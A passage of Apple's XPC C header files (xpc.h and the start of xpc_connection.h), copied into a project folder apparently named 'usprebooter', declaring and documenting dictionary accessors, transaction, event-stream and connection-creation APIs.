*XPC_COUNTEDBY(count) _Nullable keys, const xpc_object_t _Nullable *XPC_COUNTEDBY(count) _Nullable values, size_t count); /*! * @function xpc_dictionary_create_empty * * @abstract * Creates an XPC object representing a dictionary of XPC objects keyed to * C-strings. * * @result * The new dictionary object. * * @see * xpc_dictionary_create */ API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_dictionary_create_empty(void); /*! * @function xpc_dictionary_create_reply * * @abstract * Creates a dictionary that is in reply to the given dictionary. * * @param original * The original dictionary that is to be replied to. * * @result * The new dictionary object. NULL if the object was not a dictionary with a * reply context. * * @discussion * After completing successfully on a dictionary, this method may not be called * again on that same dictionary. Attempts to do so will return NULL. * * When this dictionary is sent across the reply connection, the remote end's * reply handler is invoked. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL_ALL xpc_object_t _Nullable xpc_dictionary_create_reply(xpc_object_t original); /*! * @function xpc_dictionary_set_value * * @abstract * Sets the value for the specified key to the specified object. * * @param xdict * The dictionary object which is to be manipulated. * * @param key * The key for which the value shall be set. * * @param value * The object to insert. The object is retained by the dictionary. If there * already exists a value for the specified key, the old value is released * and overwritten by the new value. This parameter may be NULL, in which case * the value corresponding to the specified key is deleted if present. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_dictionary_set_value(xpc_object_t xdict, const char *key, xpc_object_t _Nullable value); /*! * @function xpc_dictionary_get_value * * @abstract * Returns the value for the specified key. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The object for the specified key within the dictionary. NULL if there is no * value associated with the specified key or if the given object was not an * XPC dictionary. * * @discussion * This method does not grant the caller a reference to the underlying object, * and thus the caller is not responsible for releasing the object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 XPC_NONNULL2 xpc_object_t _Nullable xpc_dictionary_get_value(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_count * * @abstract * Returns the number of values stored in the dictionary. * * @param xdict * The dictionary object which is to be examined. * * @result * The number of values stored in the dictionary or 0 if the given object was * not an XPC dictionary. Calling xpc_dictionary_set_value() with a non-NULL * value will increment the count. Calling xpc_dictionary_set_value() with a * NULL value will decrement the count. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 size_t xpc_dictionary_get_count(xpc_object_t xdict); /*! * @function xpc_dictionary_apply * * @abstract * Invokes the given block for every key/value pair in the dictionary. * * @param xdict * The dictionary object which is to be examined. * * @param applier * The block which this function applies to every key/value pair in the * dictionary. * * @result * A Boolean indicating whether iteration of the dictionary completed * successfully. Iteration will only fail if the applier block returns false. * * @discussion * You should not modify a dictionary's contents during iteration. There is no * guaranteed order of iteration over dictionaries. */ #ifdef __BLOCKS__ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL bool xpc_dictionary_apply(xpc_object_t xdict, XPC_NOESCAPE xpc_dictionary_applier_t applier); #endif // __BLOCKS__ /*! * @function xpc_dictionary_get_remote_connection * * @abstract * Returns the connection from which the dictionary was received. * * @param xdict * The dictionary object which is to be examined. * * @result * If the dictionary was received by a connection event handler or a dictionary * created through xpc_dictionary_create_reply(), a connection object over which * a reply message can be sent is returned. For any other dictionary, NULL is * returned. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL xpc_connection_t _Nullable xpc_dictionary_get_remote_connection(xpc_object_t xdict); #pragma mark Dictionary Primitive Setters /*! * @function xpc_dictionary_set_bool * * @abstract * Inserts a bool (primitive) value into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param value * The bool value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_dictionary_set_bool(xpc_object_t xdict, const char *key, bool value); /*! * @function xpc_dictionary_set_int64 * * @abstract * Inserts an int64_t (primitive) value into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param value * The int64_t value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_dictionary_set_int64(xpc_object_t xdict, const char *key, int64_t value); /*! * @function xpc_dictionary_set_uint64 * * @abstract * Inserts a uint64_t (primitive) value into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param value * The uint64_t value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_dictionary_set_uint64(xpc_object_t xdict, const char *key, uint64_t value); /*! * @function xpc_dictionary_set_double * * @abstract * Inserts a double (primitive) value into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param value * The double value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_dictionary_set_double(xpc_object_t xdict, const char *key, double value); /*! * @function xpc_dictionary_set_date * * @abstract * Inserts a date (primitive) value into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param value * The date value to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved with * {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_dictionary_set_date(xpc_object_t xdict, const char *key, int64_t value); /*! * @function xpc_dictionary_set_data * * @abstract * Inserts a raw data value into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param bytes * The bytes to insert. After calling this method, the XPC object corresponding * to the primitive value inserted may be safely retrieved with * {@link xpc_dictionary_get_value()}. * * @param length * The length of the data. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 XPC_NONNULL3 void xpc_dictionary_set_data(xpc_object_t xdict, const char *key, const void *XPC_SIZEDBY(length) bytes, size_t length); /*! * @function xpc_dictionary_set_string * * @abstract * Inserts a C string value into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param string * The C string to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved with * {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 XPC_NONNULL3 void xpc_dictionary_set_string(xpc_object_t xdict, const char *key, const char *string); /*! * @function xpc_dictionary_set_uuid * * @abstract * Inserts a uuid (primitive) value into an array. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param uuid * The uuid_t value to insert. After calling this method, the XPC * object corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 XPC_NONNULL3 void xpc_dictionary_set_uuid(xpc_object_t xdict, const char *key, const uuid_t XPC_NONNULL_ARRAY uuid); /*! * @function xpc_dictionary_set_fd * * @abstract * Inserts a file descriptor into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param fd * The file descriptor to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_dictionary_get_value()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 void xpc_dictionary_set_fd(xpc_object_t xdict, const char *key, int fd); /*! * @function xpc_dictionary_set_connection * * @abstract * Inserts a connection into a dictionary. * * @param xdict * The dictionary which is to be manipulated. * * @param key * The key for which the primitive value shall be set. * * @param connection * The connection to insert. After calling this method, the XPC object * corresponding to the primitive value inserted may be safely retrieved * with {@link xpc_dictionary_get_value()}. The connection is NOT retained by * the dictionary. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 XPC_NONNULL3 void xpc_dictionary_set_connection(xpc_object_t xdict, const char *key, xpc_connection_t connection); #pragma mark Dictionary Primitive Getters /*! * @function xpc_dictionary_get_bool * * @abstract * Gets a bool primitive value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The underlying bool value for the specified key. false if the * the value for the specified key is not a Boolean value or if there is no * value for the specified key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL bool xpc_dictionary_get_bool(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_int64 * * @abstract * Gets an int64 primitive value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The underlying int64_t value for the specified key. 0 if the * value for the specified key is not a signed integer value or if there is no * value for the specified key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL int64_t xpc_dictionary_get_int64(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_uint64 * * @abstract * Gets a uint64 primitive value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The underlying uint64_t value for the specified key. 0 if the * value for the specified key is not an unsigned integer value or if there is * no value for the specified key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL uint64_t xpc_dictionary_get_uint64(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_double * * @abstract * Gets a double primitive value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The underlying double value for the specified key. NAN if the * value for the specified key is not a floating point value or if there is no * value for the specified key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL double xpc_dictionary_get_double(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_date * * @abstract * Gets a date value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The underlying date interval for the specified key. 0 if the value for the * specified key is not a date value or if there is no value for the specified * key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL int64_t xpc_dictionary_get_date(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_data * * @abstract * Gets a raw data value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @param length * For the data type, the third parameter, upon output, will contain the length * of the data corresponding to the specified key. May be NULL. * * @result * The underlying raw data for the specified key. NULL if the value for the * specified key is not a data value or if there is no value for the specified * key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 const void * _Nullable xpc_dictionary_get_data(xpc_object_t xdict, const char *key, size_t * _Nullable length); /*! * @function xpc_dictionary_get_string * * @abstract * Gets a C string value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The underlying C string for the specified key. NULL if the value for the * specified key is not a C string value or if there is no value for the * specified key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL const char * _Nullable xpc_dictionary_get_string(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_uuid * * @abstract * Gets a uuid value from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The underlying uuid_t value for the specified key. NULL if the * value at the specified index is not a UUID value. The returned pointer may be * safely passed to the uuid(3) APIs. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 XPC_NONNULL2 const uint8_t * _Nullable xpc_dictionary_get_uuid(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_dup_fd * * @abstract * Creates a file descriptor from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * A new file descriptor created from the value for the specified key. You are * responsible for close(2)ing this descriptor. -1 if the value for the * specified key is not a file descriptor value or if there is no value for the * specified key. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL int xpc_dictionary_dup_fd(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_create_connection * * @abstract * Creates a connection from a dictionary directly. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * A new connection created from the value for the specified key. You are * responsible for calling xpc_release() on the returned connection. NULL if the * value for the specified key is not an endpoint containing a connection or if * there is no value for the specified key. Each call to this method for the * same key in the same dictionary will yield a different connection. See * {@link xpc_connection_create_from_endpoint()} for discussion as to the * responsibilities when dealing with the returned connection. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL_ALL xpc_connection_t _Nullable xpc_dictionary_create_connection(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_dictionary * * @abstract * Returns the dictionary value for the specified key. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The object for the specified key within the dictionary. NULL if there is no * value associated with the specified key, if the given object was not an * XPC dictionary, or if the object for the specified key is not a dictionary. * * @discussion * This method does not grant the caller a reference to the underlying object, * and thus the caller is not responsible for releasing the object. */ __OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL xpc_object_t _Nullable xpc_dictionary_get_dictionary(xpc_object_t xdict, const char *key); /*! * @function xpc_dictionary_get_array * * @abstract * Returns the array value for the specified key. * * @param xdict * The dictionary object which is to be examined. * * @param key * The key whose value is to be obtained. * * @result * The object for the specified key within the dictionary. NULL if there is no * value associated with the specified key, if the given object was not an * XPC dictionary, or if the object for the specified key is not an array. * * @discussion * This method does not grant the caller a reference to the underlying object, * and thus the caller is not responsible for releasing the object. */ __OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL_ALL xpc_object_t _Nullable xpc_dictionary_get_array(xpc_object_t xdict, const char *key); #pragma mark Runtime /*! * @function xpc_main * The springboard into the XPCService runtime. This function will set up your * service bundle's listener connection and manage it automatically. After this * initial setup, this function will, by default, call dispatch_main(). You may * override this behavior by setting the RunLoopType key in your XPC service * bundle's Info.plist under the XPCService dictionary. * * @param handler * The handler with which to accept new connections. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NORETURN XPC_NONNULL1 void xpc_main(xpc_connection_handler_t handler); #pragma mark Transactions /*! * @function xpc_transaction_begin * Informs the XPC runtime that a transaction has begun and that the service * should not exit due to inactivity. * * @discussion * A service with no outstanding transactions may automatically exit due to * inactivity as determined by the system. * * This function may be used to manually manage transactions in cases where * their automatic management (as described below) does not meet the needs of an * XPC service. This function also updates the transaction count used for sudden * termination, i.e. vproc_transaction_begin(), and these two interfaces may be * used in combination. * * The XPC runtime will automatically begin a transaction on behalf of a service * when a new message is received. If no reply message is expected, the * transaction is automatically ended when the last reference to the message is released. * If a reply message is created, the transaction will end when the reply * message is sent or released. An XPC service may use xpc_transaction_begin() * and xpc_transaction_end() to inform the XPC runtime about activity that * occurs outside of this common pattern. * * On macOS, when the XPC runtime has determined that the service should exit, * the event handlers for all active peer connections will receive * {@link XPC_ERROR_TERMINATION_IMMINENT} as an indication that they should * unwind their existing transactions. After this error is delivered to a * connection's event handler, no more messages will be delivered to the * connection. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_TRANSACTION_DEPRECATED XPC_EXPORT void xpc_transaction_begin(void); /*! * @function xpc_transaction_end * Informs the XPC runtime that a transaction has ended. * * @discussion * As described in {@link xpc_transaction_begin()}, this API may be used * interchangeably with vproc_transaction_end(). * * See the discussion for {@link xpc_transaction_begin()} for details regarding * the XPC runtime's idle-exit policy. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_TRANSACTION_DEPRECATED XPC_EXPORT void xpc_transaction_end(void); #pragma mark XPC Event Stream /*! * @function xpc_set_event_stream_handler * Sets the event handler to invoke when streamed events are received. * * @param stream * The name of the event stream for which this handler will be invoked. * * @param targetq * The GCD queue to which the event handler block will be submitted. This * parameter may be NULL, in which case the connection's target queue will be * libdispatch's default target queue, defined as DISPATCH_TARGET_QUEUE_DEFAULT. * * @param handler * The event handler block. The event which this block receives as its first * parameter will always be a dictionary which contains the XPC_EVENT_KEY_NAME * key. The value for this key will be a string whose value is the name assigned * to the XPC event specified in the launchd.plist. Future keys may be added to * this dictionary. * * @discussion * Multiple calls to this function for the same event stream will result in * undefined behavior. * * There is no API to pause delivery of XPC events. If a process that * has set an XPC event handler exits, events may be dropped due to races * between the event handler running and the process exiting. */ #if __BLOCKS__ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL3 void xpc_set_event_stream_handler(const char *stream, dispatch_queue_t _Nullable targetq, xpc_handler_t handler); #endif // __BLOCKS__ __END_DECLS XPC_ASSUME_NONNULL_END #endif // __XPC_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/xpc_connection.h ================================================ #ifndef __XPC_CONNECTION_H__ #define __XPC_CONNECTION_H__ #ifndef __XPC_INDIRECT__ #error "Please #include instead of this file directly." // For HeaderDoc. #include "base.h" #endif // __XPC_INDIRECT__ #ifndef __BLOCKS__ #error "XPC connections require Blocks support." #endif // __BLOCKS__ XPC_ASSUME_NONNULL_BEGIN __BEGIN_DECLS /*! * @constant XPC_ERROR_CONNECTION_INTERRUPTED * Will be delivered to the connection's event handler if the remote service * exited. The connection is still live even in this case, and resending a * message will cause the service to be launched on-demand. This error serves * as a client's indication that it should resynchronize any state that it had * given the service. * * Any messages in the queue to be sent will be unwound and canceled when this * error occurs. In the case where a message waiting to be sent has a reply * handler, that handler will be invoked with this error. In the context of the * reply handler, this error indicates that a reply to the message will never * arrive. * * Messages that do not have reply handlers associated with them will be * silently disposed of. This error will only be given to peer connections. */ #define XPC_ERROR_CONNECTION_INTERRUPTED \ XPC_GLOBAL_OBJECT(_xpc_error_connection_interrupted) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT const struct _xpc_dictionary_s _xpc_error_connection_interrupted; /*! * @constant XPC_ERROR_CONNECTION_INVALID * Will be delivered to the connection's event handler if the named service * provided to xpc_connection_create() could not be found in the XPC service * namespace. The connection is useless and should be disposed of. * * Any messages in the queue to be sent will be unwound and canceled when this * error occurs, similarly to the behavior when XPC_ERROR_CONNECTION_INTERRUPTED * occurs. The only difference is that the XPC_ERROR_CONNECTION_INVALID will be * given to outstanding reply handlers and the connection's event handler. * * This error may be given to any type of connection. */ #define XPC_ERROR_CONNECTION_INVALID \ XPC_GLOBAL_OBJECT(_xpc_error_connection_invalid) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT const struct _xpc_dictionary_s _xpc_error_connection_invalid; /*! * @constant XPC_ERROR_TERMINATION_IMMINENT * On macOS, this error will be delivered to a peer connection's event handler * when the XPC runtime has determined that the program should exit and that * all outstanding transactions must be wound down, and no new transactions can * be opened. * * After this error has been delivered to the event handler, no more messages * will be received by the connection. The runtime will still attempt to deliver * outgoing messages, but this error should be treated as an indication that * the program will exit very soon, and any outstanding business over the * connection should be wrapped up as quickly as possible and the connection * canceled shortly thereafter. * * This error will only be delivered to peer connections received through a * listener or the xpc_main() event handler. */ #define XPC_ERROR_TERMINATION_IMMINENT \ XPC_GLOBAL_OBJECT(_xpc_error_termination_imminent) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT const struct _xpc_dictionary_s _xpc_error_termination_imminent; /*! * @constant XPC_ERROR_PEER_CODE_SIGNING_REQUIREMENT * On macOS, this error will be delivered to a peer connection's event handler * when the XPC runtime has detected that a peer connection does not * satisfy the code signing requirement specified for the connection. * * See {@link xpc_connection_set_peer_code_signing_requirement} */ #define XPC_ERROR_PEER_CODE_SIGNING_REQUIREMENT \ XPC_GLOBAL_OBJECT(_xpc_error_peer_code_signing_requirement) __API_AVAILABLE(macos(12.0)) XPC_EXPORT const struct _xpc_dictionary_s _xpc_error_peer_code_signing_requirement; /*! * @constant XPC_CONNECTION_MACH_SERVICE_LISTENER * Passed to xpc_connection_create_mach_service(). This flag indicates that the * caller is the listener for the named service. This flag may only be passed * for services which are advertised in the process' launchd.plist(5). You may * not use this flag to dynamically add services to the Mach bootstrap * namespace. */ #define XPC_CONNECTION_MACH_SERVICE_LISTENER (1 << 0) /*! * @constant XPC_CONNECTION_MACH_SERVICE_PRIVILEGED * Passed to xpc_connection_create_mach_service(). This flag indicates that the * job advertising the service name in its launchd.plist(5) should be in the * privileged Mach bootstrap. This is typically accomplished by placing your * launchd.plist(5) in /Library/LaunchDaemons. If specified alongside the * XPC_CONNECTION_MACH_SERVICE_LISTENER flag, this flag is a no-op. */ #define XPC_CONNECTION_MACH_SERVICE_PRIVILEGED (1 << 1) /*! * @typedef xpc_finalizer_f * A function that is invoked when a connection is being torn down and its * context needs to be freed. The sole argument is the value that was given to * {@link xpc_connection_set_context} or NULL if no context has been set. It is * not safe to reference the connection from within this function. * * @param value * The context object that is to be disposed of. */ typedef void (*xpc_finalizer_t)(void * _Nullable value); /*! * @function xpc_connection_create * Creates a new connection object. * * @param name * If non-NULL, the name of the service with which to connect. The returned * connection will be a peer. * * If NULL, an anonymous listener connection will be created. You can embed the * ability to create new peer connections in an endpoint, which can be inserted * into a message and sent to another process . * * @param targetq * The GCD queue to which the event handler block will be submitted. This * parameter may be NULL, in which case the connection's target queue will be * libdispatch's default target queue, defined as DISPATCH_TARGET_QUEUE_DEFAULT. * The target queue may be changed later with a call to * xpc_connection_set_target_queue(). * * @result * A new connection object. The caller is responsible for disposing of the * returned object with {@link xpc_release} when it is no longer needed. * * @discussion * This method will succeed even if the named service does not exist. This is * because the XPC namespace is not queried for the service name until the * connection has been activated. See {@link xpc_connection_activate()}. * * XPC connections, like dispatch sources, are returned in an inactive state, so * you must call {@link xpc_connection_activate()} in order to begin receiving * events from the connection. Also like dispatch sources, connections must be * activated and not suspended in order to be safely released. It is * a programming error to release an inactive or suspended connection. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_connection_t xpc_connection_create(const char * _Nullable name, dispatch_queue_t _Nullable targetq); /*! * @function xpc_connection_create_mach_service * Creates a new connection object representing a Mach service. * * @param name * The name of the remote service with which to connect. The service name must * exist in a Mach bootstrap that is accessible to the process and be advertised * in a launchd.plist. * * @param targetq * The GCD queue to which the event handler block will be submitted. This * parameter may be NULL, in which case the connection's target queue will be * libdispatch's default target queue, defined as DISPATCH_TARGET_QUEUE_DEFAULT. * The target queue may be changed later with a call to * xpc_connection_set_target_queue(). * * @param flags * Additional attributes with which to create the connection. * * @result * A new connection object. * * @discussion * If the XPC_CONNECTION_MACH_SERVICE_LISTENER flag is given to this method, * then the connection returned will be a listener connection. Otherwise, a peer * connection will be returned. See the documentation for * {@link xpc_connection_set_event_handler()} for the semantics of listener * connections versus peer connections. * * This method will succeed even if the named service does not exist. This is * because the Mach namespace is not queried for the service name until the * connection has been activated. See {@link xpc_connection_activate()}. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 xpc_connection_t xpc_connection_create_mach_service(const char *name, dispatch_queue_t _Nullable targetq, uint64_t flags); /*! * @function xpc_connection_create_from_endpoint * Creates a new connection from the given endpoint. * * @param endpoint * The endpoint from which to create the new connection. * * @result * A new peer connection to the listener represented by the given endpoint. * * The same responsibilities of setting an event handler and activating the * connection after calling xpc_connection_create() apply to the connection * returned by this API. Since the connection yielded by this API is not * associated with a name (and therefore is not rediscoverable), this connection * will receive XPC_ERROR_CONNECTION_INVALID if the listening side crashes, * exits or cancels the listener connection. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL_ALL xpc_connection_t xpc_connection_create_from_endpoint(xpc_endpoint_t endpoint); /*! * @function xpc_connection_set_target_queue * Sets the target queue of the given connection. * * @param connection * The connection object which is to be manipulated. * * @param targetq * The GCD queue to which the event handler block will be submitted. This * parameter may be NULL, in which case the connection's target queue will be * libdispatch's default target queue, defined as DISPATCH_TARGET_QUEUE_DEFAULT. * * @discussion * Setting the target queue is asynchronous and non-preemptive and therefore * this method will not interrupt the execution of an already-running event * handler block. Setting the target queue may be likened to issuing a barrier * to the connection which does the actual work of changing the target queue. * * The XPC runtime guarantees this non-preemptiveness even for concurrent target * queues. If the target queue is a concurrent queue, then XPC still guarantees * that there will never be more than one invocation of the connection's event * handler block executing concurrently. If you wish to process events * concurrently, you can dispatch_async(3) to a concurrent queue from within * the event handler. * * IMPORTANT: When called from within the event handler block, * dispatch_get_current_queue(3) is NOT guaranteed to return a pointer to the * queue set with this method. * * Despite this seeming inconsistency, the XPC runtime guarantees that, when the * target queue is a serial queue, the event handler block will execute * synchronously with respect to other blocks submitted to that same queue. When * the target queue is a concurrent queue, the event handler block may run * concurrently with other blocks submitted to that queue, but it will never run * concurrently with other invocations of itself for the same connection, as * discussed previously. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_connection_set_target_queue(xpc_connection_t connection, dispatch_queue_t _Nullable targetq); /*! * @function xpc_connection_set_event_handler * Sets the event handler block for the connection. * * @param connection * The connection object which is to be manipulated. * * @param handler * The event handler block. * * @discussion * Setting the event handler is asynchronous and non-preemptive, and therefore * this method will not interrupt the execution of an already-running event * handler block. If the event handler is executing at the time of this call, it * will finish, and then the connection's event handler will be changed before * the next invocation of the event handler. The XPC runtime guarantees this * non-preemptiveness even for concurrent target queues. * * Connection event handlers are non-reentrant, so it is safe to call * xpc_connection_set_event_handler() from within the event handler block. * * The event handler's execution should be treated as a barrier to all * connection activity. When it is executing, the connection will not attempt to * send or receive messages, including reply messages. Thus, it is not safe to * call xpc_connection_send_message_with_reply_sync() on the connection from * within the event handler. * * You do not hold a reference on the object received as the event handler's * only argument. Regardless of the type of object received, it is safe to call * xpc_retain() on the object to obtain a reference to it. * * A connection may receive different events depending upon whether it is a * listener or not. Any connection may receive an error in its event handler. * But while normal connections may receive messages in addition to errors, * listener connections will receive connections and and not messages. * * Connections received by listeners are equivalent to those returned by * xpc_connection_create() with a non-NULL name argument and a NULL targetq * argument with the exception that you do not hold a reference on them. * You must set an event handler and activate the connection. If you do not wish * to accept the connection, you may simply call xpc_connection_cancel() on it * and return. The runtime will dispose of it for you. * * If there is an error in the connection, this handler will be invoked with the * error dictionary as its argument. This dictionary will be one of the well- * known XPC_ERROR_* dictionaries. * * Regardless of the type of event, ownership of the event object is NOT * implicitly transferred. Thus, the object will be released and deallocated at * some point in the future after the event handler returns. If you wish the * event's lifetime to persist, you must retain it with xpc_retain(). * * Connections received through the event handler will be released and * deallocated after the connection has gone invalid and delivered that event to * its event handler. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL void xpc_connection_set_event_handler(xpc_connection_t connection, xpc_handler_t handler); /*! * @function xpc_connection_activate * Activates the connection. Connections start in an inactive state, so you must * call xpc_connection_activate() on a connection before it will send or receive * any messages. * * @param connection * The connection object which is to be manipulated. * * @discussion * Calling xpc_connection_activate() on an active connection has no effect. * Releasing the last reference on an inactive connection that was created with * an xpc_connection_create*() call is undefined. * * For backward compatibility reasons, 